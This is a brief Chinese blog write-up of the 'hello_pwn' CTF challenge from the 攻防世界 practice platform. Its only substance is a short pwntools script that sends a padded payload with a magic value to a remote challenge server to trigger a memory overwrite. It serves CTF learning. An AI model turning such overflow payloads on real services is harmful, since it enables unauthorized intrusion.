解题思路 查看文件信息,安全机制 代码审计 分析漏洞点 编写EXP 查看文件信息,安全机制 #### **代码审计** #### **分析漏洞点** 计算偏移量覆盖就ok #### **编写exp** 123456from pwn import *#p=process("./gf3")p=remote("111.198.29.45","45981")payload="a"*0x4+p64(1853186401)p.sendline(payload)p.interactive()文章作者: Sunset文章链接: https://pwnedyu.cn/2020/04/05/Pwn%E5%BC%9F%E5%BC%9F%E7%9A%84%E6%88%90%E9%95%BF%E6%97%A5%E8%AE%B0%EF%BC%88%E4%BA%94%EF%BC%89--%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Chello_pwn/版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Sunset's blog!CTFPwn攻防世界 打赏微信支付寶上一篇「OpenStack」双节点部署下一篇Pwn弟弟的成长日记(四)--攻防世界level3 相关推荐 2020-04-05Pwn弟弟的成长日记(二)--攻防世界guess_num 2020-04-05Pwn弟弟的成长日记(四)--攻防世界level3 2020-04-05Pwn弟弟的成长日记(三)--攻防世界level2 2020-04-05Pwn弟弟的成长日记(一)--ciscn_2019_n_1 2020-04-03CTFhub—密码口令—弱口令 2020-04-05ctfhub—密码口令—默认口令